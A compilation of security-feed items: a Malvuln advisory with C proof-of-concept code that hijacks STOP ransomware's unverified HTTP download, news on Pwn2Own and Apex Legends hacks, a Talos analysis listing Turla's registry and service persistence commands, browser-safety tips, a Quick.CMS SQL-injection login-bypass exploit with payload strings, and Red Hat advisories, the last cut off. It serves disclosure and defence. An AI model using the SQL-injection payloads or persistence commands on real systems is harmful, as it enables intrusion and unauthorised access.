Win32.STOP.Ransomware (smokeloader) malware suffers from both local and remote code execution vulnerabilities. The remote code execution can be achieved by leveraging a man-in-the-middle attack.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/3b9e9e130d52fe95c8be82aa4b8feb74.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Win32.STOP.Ransomware (smokeloader)Vulnerability: Remote Code Execution (MITM)Family: StopType: PE32MD5 3b9e9e130d52fe95c8be82aa4b8feb74Vuln ID: MVID-2024-0676Disclosure: 03/22/2024Description:There are two roads to exploitation for this particular ransomware, network "man-in-the-middle" or localized code execution, this advisory explores the network route.Stop ransomware makes several HTTP GET requests over an insecure protocol TCP port 80 to download secondary PE files "build2.exe" and "build3.exe"Moreover, no integrity checks are made on these files, well positioned third-party attackers who can intercept traffic can send back arbitrary exploit PE files.[Domains contacted]api.2ip.uasajdfue.comsdfjhuz.com[URLs]/test2/get.php?pid=A41BF90C9233CFB5AAFE279642C3793D&first=true/dl/build2.exe/files/1/build3.exeStop ransomware actions.1) Creates two directories under AppData\Local, named with unique ID e.g. "2197cd80-6ccb-4fe1-97c0-57d05945fac6"2) Sets deny permissions on the directory for everyone Everyone (OI)(CI)(DENY)(D,DC)3) Creates Windows registry Run key "SysHelper" for persistence, that points to a directory in AppData\Local     e.g. \Users\Victim\AppData\Local\407868e1-6d5a-44f2-81ba-a8fedd9ea8db\StopCrypt.exe4) Copies downloaded malware to a second created directory under AppData\LocalExploit PE file executes as a child of the parent process malware and does following on our behalf.1) Kill the parent process leveraging WIN32 API     GetCurrentProcessId()     Get parent process ID using CreateToolhelp32Snapshot()     Call OpenProcess(PROCESS_TERMINATE, FALSE,  ppid)2) Delete registry persistence Run key "SysHelper" 3) Modify permissions on Stops backup directory to full access for everyone user group "/grant Everyone (OI)(CI)F" 4) Deletes the malware backup directory under AppData\Local[PoC/Video URL]https://www.youtube.com/watch?v=S6E62YIOczo[Sample]https://bazaar.abuse.ch/sample/caeecccfee0962fbe3d4fb4ab336bf3d1230b12ad0821ff66f7a2cabc289c954/By the way, "urlmon.dll" DLL file exported by "RansomLord v2" can be used against this sample for local exploitation.Download: https://github.com/malvuln/RansomLordAll tests conducted successfully in a virtual machine environment using DNS and traffic redirection techniques.Network Exploit/PoC1) Compile the below "StopExploit.c" code as "build2.exe" and "build3.exe"2) Create directory "dl" and save build2.exe here3) Create directories "files/1" and save build3.exe here      Note, In my tests exploitation worked with just the "build2.exe" saved in the "dl" directory.4) Start web server on TCP port 80      python -m http.server 805) Intercept the Stop Ransomware traffic and DNS to server we control, send back exploit files."StopExploit.c" #include "windows.h"#include "stdio.h"#include "tlhelp32.h"#include "psapi.h"#define BUFFER 512//[+] Win32 STOP (smokeloader) Ransomware//[+] MD5 3b9e9e130d52fe95c8be82aa4b8feb74//[+] Remote Code Execution PoC//[+] By John Page (aka hyp3rlinx) - malvuln//[+] ApparitionSec//[+] March 19, 2024 //=========================================================================//Abuses MITM insecure download over TCP port 80 to serve exploits to kill "Win32.Stop" malware//Deletes persistence Run key "SysHelper" and secondary malware backup directory//Tested successfully in Virtual Machine environment using DNS and network traffic redirection.//=========================================================================////linker -lpsapi (Dev-C++) x32////=========================================================================/** DISCLAIMERAuthor is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**///=========================================================================DWORD getParentPID(DWORD pid);void Kill_StopCrypt();void DelSysHelper();void EvictBackupMalware(char *maldir);int main(void){    Sleep(3000);    DelSysHelper();    return 666;}void Kill_StopCrypt(){        DWORD pid, ppid;        pid = GetCurrentProcessId();        ppid = getParentPID(pid);        HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE,  ppid);      if (NULL != handle){        DelSysHelper();        TerminateProcess(handle, 0);        CloseHandle(handle);     }}void DelSysHelper(){  char value[BUFFER];  DWORD BufferSize = sizeof value;  LONG rc = RegGetValueA(HKEY_CURRENT_USER, (LPCSTR)"Software\\Microsoft\\Windows\\CurrentVersion\\Run", (LPCSTR)"SysHelper", RRF_RT_ANY, NULL, (PVOID)&value, &BufferSize);  if(rc == ERROR_SUCCESS){     rc = RegDeleteKey(HKEY_CURRENT_USER, (LPTSTR)"Software\\Microsoft\\Windows\\CurrentVersion\\Run");      if(rc == ERROR_SUCCESS){         Kill_StopCrypt();      }      EvictBackupMalware(value);   } }DWORD getParentPID(DWORD pid){    HANDLE h = NULL;    PROCESSENTRY32 pe={0};    DWORD ppid = 0;    pe.dwSize = sizeof(PROCESSENTRY32);    h = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);    if(Process32First(h, &pe)){        do {          if (pe.th32ProcessID==pid){            ppid = pe.th32ParentProcessID;            break;         }        } while(Process32Next(h, &pe));    }    CloseHandle(h);    return (ppid);}char* concat(const char *s1, const char *s2){   char *result = malloc(strlen(s1) + strlen(s2) + 1);   strcpy(result, s1);   strcat(result, s2);   return result;}void EvictBackupMalware(char *maldir){  char *infected_dir_path;  int j = 0;  int cnt = 0;   int i;  char array[255][255];  for (i=0; i <= (strlen(maldir)); i++){    if (maldir[i] == '\\' || maldir[i]=='\0'){        array[cnt][j]='\0';        cnt++;        j=0;     }else{      array[cnt][j]=maldir[i];      j++;        }   }    char result[256]="C:\\Users\\";    char *r1;    char *r2;    for (i = 0; i < cnt; i++) {        //printf(" %s %d\n", array[i],i);        r1 = concat(result, array[2]);        r2 = concat(r1, "\\AppData\\Local\\");        //reg run key path points to this infected directory        infected_dir_path = concat(r2, array[5]);    }    //printf("target: %s", infected_dir_path);    char perm[256]="icacls ";    char *r3;    char *perm_cmd;    r3 = concat(perm, infected_dir_path);    //reset permissions on dir created by Stop ransomware    perm_cmd = concat(r3, " /grant Everyone:(OI)(CI)F");    system(perm_cmd);    //evict backed up malware and dir    char del_cmd[256]="RD ";    char *force_del = concat(del_cmd, infected_dir_path);    char *bye_bye_douche = concat(force_del, " /S /Q");    system(bye_bye_douche);}//malvuln circa 2024Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Win32.STOP.Ransomware (Smokeloader) MVID-2024-0676 Remote Code Execution

By Deeba Ahmed
Pwn2Own is back!
This is a post from HackRead.com Read the original post: Pwn2Own 2024 Awards $700k as Hackers Pwn Tesla, Browsers, and More

The Pwn2Own 2024 hacking contest saw a record-breaking first day as participants exposed critical vulnerabilities in Tesla vehicles, popular browsers, and operating systems – This highlights the ongoing challenge of securing our technology and the importance of bug bounty programs.

The Pwn2Own 2024, a hacking contest organized by Trend Micro’s Zero Day Initiative in Vancouver, saw participants earn over $700,000 on the first day through successful exploits against Tesla cars, browsers, and Linux and Windows systems. 

French cybersecurity firm Synacktiv’s hackers earned $200,000 for an integer overflow exploit targeting the Tesla ECU with CAN bus control and also won a new Tesla Model 3. It is worth noting that this was the only scheduled hacking attempt for Tesla cars for this contest. 

However, this isn’t the first time Synacktiv has dominated Pwn2Own – they previously won a car in Pwn2Own Automotive 2024. 

Tesla pwned (Screenshot: ZDI)

****About the Vulnerability****

While the specific details of the exploit remain undisclosed, as per Pwn2Own rules to allow for vendor patching, the competition organizers confirmed that a single integer overflow flaw was used. This vulnerability allowed the team to gain control of the Tesla’s CAN BUS, a crucial communication system within the car. Synacktiv exploited a Tesla ECU with Vehicle (VEH) CAN BUS Control using a single integer overflow flaw to secure their second victory in Pwn2Own competitions. 

****Day One Highlights****

On day one of the Pwn2Own contest, participants were awarded $732,500 by ZDI for reporting 19 unique zero-day vulnerabilities. Here’s the breakdown of the rewards.

Independent white-hat hacker Manfred Paul received $102,500 for remote code execution on Apple Safari using an integer underflow bug, and a PAC bypass exploiting a flaw in the same browser. Paul also executed a double-tap exploit on Chrome and Edge browsers using a rare CWE-1284 vulnerability in round two of the competition.

South Korean team Theori earned $130,000 by combining an uninitialized variable bug, a use-after-free (UAF) vulnerability, and heap-based buffer overflow to escape a VMware Workstation and execute code as system on Windows OS.

Oracle VirtualBox was targeted by REverse Tactics researchers, earning $90,000 and two researchers received $20,000 for their respective Oracle VirtualBox exploits. 

Other Pwn2Own participants earned rewards for Chrome and Edge, Safari, Adobe Reader, Windows 11 local privilege escalation, and two Ubuntu local privilege escalation exploits. 

Seunghyun Lee, AbdulAziz Hariri, and the Devcore Research team successfully exploited Google Chrome, Adobe Reader, and Windows 11 bugs, earning them $60,000, $50,000, and $30,000 respectively. Lee successfully executed an exploit on Google Chrome, Hariri completed a code execution attack, and the Devcore Research team successfully executed a local privilege escalation (LPE) attack.

Chrome browser pwned (Screenshot: ZDI)

Participants will attempt to hack various software on the second day, including VMware Workstation, Oracle VirtualBox, Firefox, Chrome, Edge, Ubuntu, Windows 11, and Docker Desktop. The three-day event is offering a total of $1.3m in cash and prizes.

1.  Whitehat hacker bypasses SQL injection filter for Cloudflare
2.  Hackers Crack Tesla Twice, Rake in $1.3 Million at Pwn2Own
3.  White hat hackers infect Canon DSLR camera with ransomware
4.  Whitehat hacker shows how to detect hidden cameras in hotels
5.  White hat hacker infects smart coffee machine with ransomware

Pwn2Own 2024 Awards $700k as Hackers Pwn Tesla, Browsers, and More

We now have new information on the entire kill chain this actor uses, including the tactics, techniques and procedures (TTPs) utilized to steal valuable information from their victims and propagate through their infected enterprises.

Cisco Talos is providing an update on its two recent reports on a new and ongoing campaign where Turla, a Russian espionage group, deployed their TinyTurla-NG (TTNG) implant. We now have new information on the entire kill chain this actor uses, including the tactics, techniques and procedures (TTPs) utilized to steal valuable information from their victims and propagate through their infected enterprises. 

*   Talos’ analysis, in coordination with CERT.NGO, reveals that Turla infected multiple systems in the compromised network of a European non-governmental organization (NGO). 

*   The attackers compromised the first system, established persistence and added exclusions to anti-virus products running on these endpoints as part of their preliminary post-compromise actions. 

*   Turla then opened additional channels of communication via Chisel for data exfiltration and to pivot to additional accessible systems in the network.

**Tracing Turla’s steps from compromise to exfiltration**

Talos discovered that post-compromise activity carried out by Turla in this intrusion isn’t restricted to the sole deployment of their backdoors. Before deploying TinyTurla-NG, Turla will attempt to configure anti-virus software exclusions to evade detection of their backdoor. Once exclusions have been set up, TTNG is written to the disk, and persistence is established by creating a malicious service.

**Preliminary post-compromise activity and TinyTurla-NG deployment**

After gaining initial access, Turla first adds exclusions in the anti-virus software, such as Microsoft Defender, to locations they will use to host the implant on the compromised systems.

ACTION

INTENT

HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths | 

“C:\\Windows\\System32\\” = 0x0

\[T1562.001\] Impair Defenses: Disable or Modify Tools

Turla then sets up the persistence of the TinyTurla-NG implants using one or more batch (BAT) files. The batch files create a service on the system to persist the TTNG DLL on the system. 

ACTION

INTENT

reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" /v sysman /t REG\_MULTI\_SZ /d "sdm" /f

reg add "HKLM\\SYSTEM\\CurrentControlSet\\services\\sdm\\Parameters" /v ServiceDll /t REG\_EXPAND\_SZ /d "%systemroot%\\system32\\dcmd.dll" /f

\[T1543.003\] Create or Modify System Process: Windows Service

sc create sdm binPath= "c:\\windows\\system32\\svchost.exe -k sysman" type= share start= auto

sc config sdm DisplayName= "System Device Manager"

sc description sdm "Creates and manages system-mode driver processes. This service cannot be stopped."

  

\[T1543.003\] Create or Modify System Process: Windows Service

This technique is identical to that used by Turla in 2021 to achieve persistence for their TinyTurla implants. However, we’re still unsure why the actor uses two different batch files, but it seems to be an unnecessarily convoluted approach to evade detections.

In the case of TTNG, the service is created with the name “sdm” masquerading as a “System Device Manager” service. 

Batch file contents.

The creation and start of the malicious service kick starts the execution of the TinyTurla-NG implant via svchost\[.\]exe (Windows’ service container). TinyTurla-NG is instrumented further to conduct additional reconnaissance of directories of interest and then copy files to a temporary staging directory on the infected system, followed by subsequent exfiltration to the C2. TinyTurla-NG is also used to deploy a custom-built Chisel beacon from the open-sourced offensive framework.

**Custom Chisel usage**

On deployment, Chisel will set up a reverse proxy tunnel to an attacker-controlled box \[T1573.002 - Encrypted Channel: Asymmetric Cryptography\]. We’ve observed that the attackers leveraged the chisel connection to the initially compromised system, to pivot to other systems in the network. 

The presence of Windows Remote Management (WinRM)-based connections on the target systems indicates that chisel was likely used in conjunction with other tools, such as proxy chains and evil-winrm to establish remote sessions. WinRM is Microsoft’s implementation of the WS-Management protocol and allows Windows-based systems to exchange information and be administered using scripts or built-in utilities.

The overall infection chain is visualized below.

Turla tactics, tools and procedures flow.

Once the attackers have gained access to a new box, they will repeat their activities to create Microsoft Defender exclusions, drop the malware components, and create persistence, indicating that Turla follows a playbook that can be articulated as the following cyber kill chain.

Cyber kill chain.

Analyzing the traffic originating from Chisel revealed the tool beaconed back to its C2 server every hour.

While the infected systems were compromised as early as October 2023 and Chisel was deployed as late as December 2023, Turla operators conducted the majority of their data exfiltration over using Chisel much later on Jan. 12, 2024 \[T1041 - Exfiltration Over C2 Channel\].

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCS****Hashes**

267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b

d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40

ad4d196b3d85d982343f32d52bffc6ebfeec7bf30553fa441fd7c3ae495075fc

13c017cb706ef869c061078048e550dba1613c0f2e8f2e409d97a1c0d9949346

b376a3a6bae73840e70b2fa3df99d881def9250b42b6b8b0458d0445ddfbc044 

**Domains**

hanagram\[.\]jpthefinetreats\[.\]com

caduff-sa\[.\]chjeepcarlease\[.\]com

buy-new-car\[.\]com

carleasingguru\[.\]com

**IP Addresses**

91\[.\]193\[.\]18\[.\]120

New details on TinyTurla’s post-compromise activity reveal full kill chain

By Uzair Amir
Your web browser serves as the gateway to the internet, but it also acts as a potential entry point for cybercriminals to access your computer and smartphone.
This is a post from HackRead.com Read the original post: Why Browser Security Matters More Than You Think

In today’s interconnected world, where our lives revolve around the internet, it’s imperative to understand the importance of browser security. Whether it’s for personal use or professional purposes, web browsers function as our primary gateway to the online world.

Consequently, they also serve as a potential entry point for cyber threats and attacks. In this article, we’ll highlight why browser security matters more than you might think and discuss some essential steps to enhance your online safety.

**The Growing Cybersecurity Threat:**

It’s no secret that cyber threats have become increasingly sophisticated over the years. Cybercriminals are constantly finding new ways to exploit vulnerabilities in browsers, leaving users vulnerable to privacy breaches, data thefts, and financial frauds.

According to cybersecurity experts, one of the most common tactics used by hackers is cross-site scripting (XSS) attacks. These malicious scripts injected into web pages can compromise users’ sensitive information.

****Major Web Browsers Remain At Risk:****

While modern web browsers work diligently to enhance their security features, they are not completely immune from threats. Some developers argue that certain browsers are more secure than others due to their built-in security mechanisms. However, critics believe that no browser is entirely invincible. Over time, vulnerabilities may emerge for even the most popular browsers for Windows as hackers adapt and discover new methods of attack.

****The Need for Vigilance and Proactive Measures:****

Considering the persistent threat surrounding web browsers, users like us must remain proactive with our online safety measures:

****1\. Keep Your Browser Up-to-Date:****

Vendors frequently release security patches and updates for their web browsers as vulnerabilities are discovered and fixed. By regularly updating your browser software, you stay protected against known threats.

****2\. Enable Automatic Updates:****

Enabling automatic updates ensures that you receive critical security updates immediately upon release without any manual intervention.

****3\. Utilize Browser Extensions with Caution:****

Browser extensions can add extra functionality and enhance your browsing experience. However, they may also act as potential gateways for hackers. It’s important to research and use trustworthy extensions from reputable sources.

****4\. Enable Two-Factor Authentication (2FA):****

Activating 2FA adds a layer of security to your user account by requiring you to provide a second form of verification, such as a unique code sent to your mobile device or email.

****5\. Implement Strong and Unique Passwords:****

We’ve heard it countless times, but it bears repeating: strong, complex, and unique passwords are essential. Avoid using easily guessable passwords like consecutive numbers or common phrases. Consider utilizing a password manager to store and generate unique passwords securely.

****6\. Regularly Clear Browser Cache and Cookies:****

Clearing your browser cache and cookies can help protect your privacy and prevent unauthorized access to your online activities.

****7\. Use Privacy-Focused Browsing Modes:****

Most popular web browsers offer private browsing modes that do not retain any browsing history or save cookies upon session closure. Utilize these specialized modes when accessing sensitive information or using public networks.

****8\. Be Cautious with Downloads:****

Exercise caution when downloading files from the internet, particularly those sent by unknown sources. Malware can be disguised within seemingly harmless files, leading to potential security breaches.

****Common Mistakes to Avoid:****

Despite the importance of browser security, many users make common mistakes that can leave them vulnerable to cyber threats. By avoiding these pitfalls, you can significantly enhance your online safety.

****1\. Ignoring Updates:****

One of the most common mistakes people make is neglecting to update their web browsers. Developers continuously release updates to patch security vulnerabilities and improve overall performance. If you ignore these updates, your browser remains susceptible to attacks targeting known vulnerabilities.

****2\. Clicking on Suspicious Links:****

Clicking on suspicious links in emails or on unfamiliar websites can lead to malware infection or phishing attempts. Always be cautious and verify the authenticity of links before clicking on them.

****3\. Using Weak Passwords Across Multiple Websites:****

Using weak passwords that are easy to guess or reusing passwords across multiple websites places all your accounts at risk if one becomes compromised. Implement strong and unique passwords for each online service you use, and consider using a password manager to manage them securely.

****Conclusion:****

Your browser is more than just a tool for internet navigation; it serves as the gateway between you and the digital world around you – a world teeming with cyber threats desperately seeking gaps in security measures to infiltrate unknowing users’ devices.

By prioritizing browser security, remaining vigilant against emerging threats, and implementing the tips mentioned above, we can significantly reduce our vulnerability to cyber-attacks.

Remember: taking proactive steps towards enhancing browser security today means safeguarding yourself against tomorrow’s evolving risks—a small price for maintaining online safety in an ever-connected world.

1.  Apple Safari Safest, Google Chrome Riskiest Browser
2.  Mullvad VPN and Tor Project Release Mullvad Browser
3.  Brave Browser enters dark web with its own Tor Onion service
4.  Google Incognito Mode: New Disclaimer Reveals Data Tracking
5.  DuckDuckGo Allows Microsoft Trackers Despite No Tracking Policy

Why Browser Security Matters More Than You Think

The North American finals of the Apex Legends Global have been postponed after at least two hacking incidents.

The North American finals of online shooter game Apex Legends has been postponed after games were disrupted by hacking incidents.

Apex Legends, published by EA, is currently in an important stage of its Global Series, the regional finals mode. This is a big deal for the top players since there is a $5 million prize pool, with a few of the top teams in each region set to battle it out in the finals.

But on Monday, the Apex Legends official X account tweeted that it had postponed the contest after deciding the “competitive integrity” of the series had been compromised.

> Due to the competitive integrity of this series being compromised, we have made the decision to postpone the NA finals at this time.  
> We will share more information soon.
> 
> — Apex Legends Esports (@PlayApexEsports) March 18, 2024

According to PCGamer, there were at least two major incidents:

> “First, Noyan “Genburten” Ozkose of DarkZero suddenly found himself able to see other players through walls, then Phillip “ImperialHal” Dosen of TSM was given an aimbot.”

An aimbot is a program or patch that allows the player to cheat by having the character’s weapon aimed automatically. Using cheats like those would lead to immediate disqualification and total loss of respect if done on purpose.

The volunteers of the Anti-Cheat Police Department warned players against playing any games protected by Easy Anti-Cheat (EAC) or any EA titles for a while, because they suspected a Remote Code Execution (RCE) exploit was being used against the players.

> PSA: There is currently an RCE exploit being abused in @PlayApex. It is unsure whether it comes from the game or the actual anti-cheat (@TeddyEAC ). I would advise against playing any games protected by EAC or any EA titles once they have fixed this or can comment.
> 
> Currently,…
> 
> — Anti-Cheat Police Department 🕵️ (@AntiCheatPD) March 18, 2024

However, recent developments point less toward an RCE being the cause and more to an actual infection on the players’ computers…

**Malwarebytes to the rescue**

In a livestream, affected gamer ImperialHal spoke to cybersecurity expert “PirateSoftware,” who has been investigating the attacks.

ImperialHal uses Malwarebytes to scan his machine which flags an inbound connection from an IP address linked to a server known for malicious activities.

It appears that the attacker had direct access to ImperialHal’s computer, likely via a Trojan. PirateSoftware concluded:

> “I don’t see evidence of Apex having RCEs. It does not mean that it’s impossible but I still don’t see evidence, while I do see evidence of him having direct access to your machine.”

**Protect yourself**

We recommend that all gamers scan their computers with reliable security software. Malwarebytes Premium for Windows’ Brute Force Protection feature blocked the connection from being made to ImperialHal’s computer, so make sure you enable that feature.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Apex Legends Global Series plagued by hackers 

There is also a newly disclosed vulnerability in a graphics driver for some NVIDIA GPUs that could lead to a memory leak.

Wednesday, March 20, 2024 12:00

Cisco Talos’ Vulnerability Research team recently disclosed three vulnerabilities across a range of products, including one that could lead to remote code execution in a popular Netgear wireless router designed for home networks. 

There is also a newly disclosed vulnerability in a graphics driver for some NVIDIA GPUs that could lead to a memory leak. 

All the vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Netgear RAX30 JSON parsing stack-based buffer overflow vulnerability **

_Discovered by Michael Gentile._ 

The Netgear RAX30 wireless router contains a stack-based buffer overflow vulnerability that could allow an attacker to execute arbitrary code on the device.  

An adversary could send a targeted device a specially crafted HTTP request to eventually cause a buffer overflow condition. 

The RAX30 is a dual-band Wi-Fi router that’s commonly used on home networks. In an advisory about TALOS-2023-1887 (CVE-2023-48725), Netgear stated that the vulnerability “requires an attacker to have your WiFi password or an Ethernet connection to a device on your network to be exploited.” 

**NVIDIA D3D10 driver out-of-bounds read vulnerability **

_Discovered by Piotr Bania._ 

TALOS-2023-1849 (CVE-2024-0071) is an out-of-bounds read vulnerability in the shader functionality of the NVIDIA D3D10 driver that runs on several NVIDIA graphics cards. Drivers like D3D10 are usually necessary for the GPU to function properly. 

An adversary could send a specially crafted executable or shader file to the targeted machine to trigger an out-of-bounds read and eventually leak memory.  

This vulnerability could be triggered from guest machines running virtual environments to perform a guest-to-host escape. Theoretically, it could be exploited from a web browser, but Talos tested this vulnerability from a Windows Hyper-V guest using the RemoteFX feature, leading to execution of the vulnerable code on the Hyper-V host. While RemoteFX is no longer actively maintained by Microsoft, some older machines may still use this software.  

An out-of-bounds read vulnerability exists in the Shader functionality of NVIDIA D3D10 Driver, Version 546.01, 31.0.15.4601. A specially crafted executable/shader file can lead to an out-of-bounds read. An attacker can provide a specially crafted shader file to trigger this vulnerability. 

An adversary could also use this vulnerability to leak host data to the guest machine. 

**Denial-of-service vulnerability in Google Chrome Video Encoder **

_Discovered by Piotr Bania._ 

A denial-of-service vulnerability in Google Chrome’s video encoder could crash the browser.  

TALOS-2023-1870 is triggered if the targeted user visits an attacker-created website that contains specific code.  

Talos’ sample exploit runs a JavaScript code related to the Chrome video encoding functionality, eventually causing a denial-of-service in the browser and stopping all processes in Chrome.

Netgear wireless router open to code execution after buffer overflow vulnerability

Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass# Google Dork: N/A# Date: 02-03-2024# Exploit Author: ./H4X.Forensics - Diyar# Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/># Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]# Version: 6.7# Tested on: Windows# CVE : N/AHow to exploit :*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php*--> Enter any Email like : root@root.com<mailto:root@root.com>*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1*--> Tick the Checkbox*--> Press Login*--> Congratz! *--> SQL Injection Authentication Bypass Payload : ' or '1'='1*--> Payloads Can be use :' or '1'='1' or ''='' or 1]%00' or /* or '' or "a" or '' or 1 or '' or true() or '

Quick.CMS 6.7 SQL Injection

Red Hat Security Advisory 2024-1325-03 - Red Hat JBoss Web Server 6.0.1 zip release is now available for Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server. Issues addressed include HTTP request smuggling, denial of service, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1325.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Web Server 6.0.1 release and security updateAdvisory ID:        RHSA-2024:1325-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1325Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-5678====================================================================Summary: Red Hat JBoss Web Server 6.0.1 zip release is now available for Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 6.0.1 serves as a replacement for Red Hat JBoss Web Server 6.0.0. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)* tomcat: : Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-5678References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=6.0https://bugzilla.redhat.com/show_bug.cgi?id=2235370https://bugzilla.redhat.com/show_bug.cgi?id=2248616https://bugzilla.redhat.com/show_bug.cgi?id=2252050https://bugzilla.redhat.com/show_bug.cgi?id=2269607

Red Hat Security Advisory 2024-1325-03

Red Hat Security Advisory 2024-1319-03 - Red Hat JBoss Web Server 5.7.8 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server. Issues addressed include HTTP request smuggling and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1319.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Web Server 5.7.8 release and security updateAdvisory ID:        RHSA-2024:1319-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1319Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-5678====================================================================Summary: Red Hat JBoss Web Server 5.7.8 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.7.8 serves as a replacement for Red Hat JBoss Web Server 5.7.7. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)* tomcat: : Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References 